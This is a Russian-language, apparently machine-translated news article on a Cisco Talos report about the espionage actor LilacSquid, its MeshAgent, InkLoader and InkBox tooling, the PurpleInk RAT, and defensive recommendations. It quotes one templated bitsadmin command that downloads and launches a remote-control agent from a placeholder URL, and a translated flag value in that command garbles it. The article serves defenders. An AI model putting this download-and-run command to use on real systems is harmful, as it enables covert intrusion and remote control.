Cisco Talos: злоумышленник LilacSquid нацелен на несколько секторов по всему миру с помощью вредоносного ПО PurpleInk

Cisco Talos: злоумышленник LilacSquid нацелен на несколько секторов по всему миру с помощью вредоносного ПО PurpleInk

6 июня 2024 г.

Новый отчет Cisco Talos раскрыл деятельность злоумышленника, известного как LilacSquid или UAT-4820. Злоумышленник использует уязвимые веб-приложения или использует скомпрометированные учетные данные для защиты удаленного рабочего стола, чтобы успешно скомпрометировать системы, заразив их специальным вредоносным ПО PurpleInk. На данный момент с целью кражи данных пострадали организации в различных секторах в США, Европе и Азии, хотя, возможно, пострадало и больше секторов, но они еще не выявлены.

Кто такой LilacSquid?

LilacSquid — это угроза кибершпионажа, действующая как минимум с 2021 года. Она также известна как UAT-4820.

Некоторые из отраслей, на которые на данный момент нацелен LilacSquid, включают:

    ИТ-организации, создающие программное обеспечение для исследовательского и промышленного секторов США. Организации энергетического сектора Европы. Организации фармацевтического сектора в Азии.

Множество тактик, методов и процедур, используемых злоумышленником, аналогичны тактикам северокорейских передовых групп постоянной угрозы, а именно «Андариэль» и ее головной структуры «Лазарь». Среди этих TTP использование программного обеспечения MeshAgent для поддержания доступа после первоначального компрометации, а также широкое использование прокси-серверов и инструментов туннелирования позволяет связать LilacSquid с Lazarus и совместно использовать инструменты, инфраструктуру или другие ресурсы.

Каковы первоначальные методы доступа LilacSquid к целям?

Первый метод: эксплуатация уязвимых веб-приложений.

Первый метод, используемый LilacSquid для компрометации своих целей, заключается в успешной эксплуатации уязвимых веб-приложений.

После завершения эксплуатации злоумышленник развертывает сценарии для настройки рабочих папок для вредоносного ПО, а затем загружает и запускает MeshAgent — инструмент удаленного управления с открытым исходным кодом. Загрузка обычно выполняется с помощью легального инструмента bitsadmin операционной системы Microsoft Windows:

bitsadmin /transfer -job_name- /download /priority нормальный -remote_URL- -local_path_for_MeshAgent-  -local_path_for_MeshAgent- Connect

MeshAgent использует текстовый файл конфигурации, известный как файл MSH, который содержит идентификатор жертвы и адрес Command & Control.

Этот инструмент позволяет оператору составлять список всех целевых устройств, просматривать рабочий стол и управлять им, управлять файлами в контролируемой системе или собирать информацию о программном и аппаратном обеспечении с устройства.

После установки и запуска MeshAgent используется для активации других инструментов, таких как Secure Socket Funneling, инструмента с открытым исходным кодом для проксирования и туннелирования коммуникаций, а также вредоносных имплантов InkLoader/PurpleInk.

Второй метод: использование скомпрометированных учетных данных RDP.

Второй метод, используемый LilacSquid для доступа к целям, состоит в использовании скомпрометированных учетных данных RDP. При использовании этого метода LilacSquid решает либо развернуть MeshAgent и продолжить атаку, либо использовать InkLoader, простой, но эффективный загрузчик вредоносных программ.

InkLoader выполняет другую полезную нагрузку: PurpleInk. Загрузчик был замечен только при выполнении PurpleInk, но его можно использовать для внедрения других вредоносных программ.

LilacSquid – Начальный доступ. Изображение: Циско Талос

Еще один загрузчик, используемый LilacSquid, — это InkBox, который считывает и расшифровывает содержимое из жестко закодированного пути к файлу на диске. Расшифрованный контент выполняется путем вызова его точки входа в процессе InkBox, работающем на компьютере. Этот расшифрованный контент представляет собой вредоносное ПО PurpleInk.

Вариант активации PurpleInk. Изображение: Циско Талос

Что такое вредоносное ПО PurpleInk?

Основной имплант, PurpleInk, используемый злоумышленником LilacSquid, основан на QuasarRAT — инструменте удаленного доступа, доступном в Интернете как минимум с 2014 года. PurpleInk был разработан на базе QuasarRAT в 2021 году и продолжает его обновлять. Он сильно запутан, чтобы затруднить его обнаружение.

Вредоносная программа использует файл конфигурации в кодировке Base64, содержащий IP-адрес и номер порта сервера C2.

PurpleInk может собирать базовую информацию, такую ​​как информация о диске (например, метки томов, имена корневых каталогов, тип и формат диска), информация о запущенных процессах или системная информация (например, объем памяти, имя пользователя, имя компьютера, IP-адреса, время безотказной работы компьютера). ). Вредоносная программа также способна пересчитывать папки, имена и размеры файлов, а также заменять или добавлять содержимое в файлы. Кроме того, PurpleInk способен запускать удаленную оболочку и отправлять/получать данные с указанного удаленного адреса, обычно с прокси-сервера.

Как снизить риск кибербезопасности LilacSquid

Чтобы защитить вашу организацию от первоначальных операций компрометации, выполняемых LilacSquid, необходимо:

    Постоянно обновляйте и исправляйте все веб-приложения, подключенные к Интернету. Кроме того, все оборудование, операционные системы и программное обеспечение должны быть обновлены и исправлены, чтобы избежать воздействия других распространенных уязвимостей. Применяйте строгие политики к RDP-подключениям сотрудников и развертывайте многофакторную аутентификацию, когда это возможно, чтобы злоумышленник не смог войти в корпоративную сеть через RDP. Найдите файлы конфигурации MeshAgent в системах, особенно если инструмент не используется внутри системы. Тщательно анализируйте любое использование инструмента bitsadmin для загрузки или выполнения кода. Отслеживайте сетевые соединения на предмет подключений к экзотическим портам или соединений, идущих непосредственно на внешние IP-адреса, а не на домены. Разверните решения по обнаружению на конечных точках — обнаружение и реагирование на конечных точках или расширенное обнаружение и реагирование — для обнаружения подозрительной активности. Повышайте осведомленность сотрудников о киберугрозах, особенно о том, как обнаруживать попытки фишинга и сообщать о них.

Раскрытие информации: я работаю в компании Trend Micro, но высказанные в этой статье взгляды являются моими.

Подпишитесь на рассылку Cybersecurity Insider Укрепите защиту ИТ-безопасности вашей организации, оставаясь в курсе последних новостей, решений и передового опыта в области кибербезопасности. Рассылка каждый понедельник, вторник и четверг Адрес электронной почты Подписываясь на нашу рассылку, вы соглашаетесь с нашими Условиями использования и Политикой конфиденциальности. Вы можете отписаться в любое время. Подписаться
Подпишитесь на информационный бюллетень Cybersecurity Insider Укрепите защиту ИТ-безопасности вашей организации, будучи в курсе последних новостей, решений и лучших практик в области кибербезопасности. Доставка каждый понедельник, вторник и четверг Адрес электронной почты Подписываясь на нашу рассылку, вы соглашаетесь с нашими Условиями использования и Политикой конфиденциальности. Вы можете отписаться в любое время. Подписаться

Оригинал
PREVIOUS ARTICLE
NEXT ARTICLE